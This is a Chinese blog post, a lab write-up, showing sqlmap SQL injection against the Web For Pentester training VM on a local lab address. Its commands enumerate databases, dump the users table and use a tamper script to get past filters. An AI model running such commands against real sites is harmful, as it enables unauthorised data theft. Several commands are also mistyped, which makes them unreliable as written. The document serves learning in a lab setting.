sqlmap注入-Web For Pentester

目录

  1. 介绍
  2. 环境
  3. sqlmap注入

 介绍

  web for pentester是国外安全研究者开发的的一款渗透测试靶机,通过该平台你可以了解到常见的Web漏洞检测技术,使用sqlmap注入,测试pentester的web页面漏洞。该靶机可以自己搭建,也可以找一些搭建好的虚拟机进行测试,目的是要指导sql注入的一些思路及sqlmap的基本使用。


 环境

>>>自己在虚拟机里搭建的Pentester网站,服务器ip地址为:192.168.202.128

>>>可以看到这个网站有很多漏洞案例,XSS、SQL注入等,本次主要就测一下sql注入的这部分吧

 


 sqlmap进行SQL注入

 >>> example1注入

a.查询当前数据库:

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example1.php?  name=root" –dbs

 

b.查询数据库对应的表

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example1.php?  name=root" -D exercises –tables

 

c.查询表内容

 

 

>>> example2注入

a.查看example2当前数据库

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.phpname=root –dbs出现报错,需要执行绕过脚本语句

root@kali:~#:sqlmap -u 192.168.202.128/sqli/example2.php?  name=root--dbs --tamper=space2comment.py -v 

 

b.查看表信息

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?  name=root -D exercises --tables

 

c.查看表下内容

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?   name=root -D exercise -T users --dump

 

 

>>> example3注入

a.查看example3当前数据库

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?  name=root –dbs出现报错,执行绕过脚本语句

root@kali:~#:sqlmap -u 192.168.202.128/sqli/example3.php?  name=root--dbs --tamper=space2comment.py -v 

 

b.查看表信息

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?   name=root -D exercises --tables

 

c.查看表下内容

root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?   name=root -D exercise -T users --dump

 

 

>>> example4注入

~~~由网址http://192.168.202.128/sqli/example4.php?id=2可以看出example4初步判断为数字型注入

a.查看数据库

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" --dbs

 

b.查看表信息

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" -D exercises --tables

 

c.查看表下内容

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" -D exercises -T users --dump

 

 

>>> example5注入

~~由网址http://192.168.202.128/sqli/example5.php?id=2可以看出example5为数字型注入

a.查看当前数据库

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" --dbs

 

b.查看表信息

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" –D exercise  --tables

 

c.查看表下相关信息

root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" –D exercise  -T users  --dump

 

posted @ 2019-07-21 01:27  请叫我阿毛  阅读(626)  评论(0编辑  收藏  举报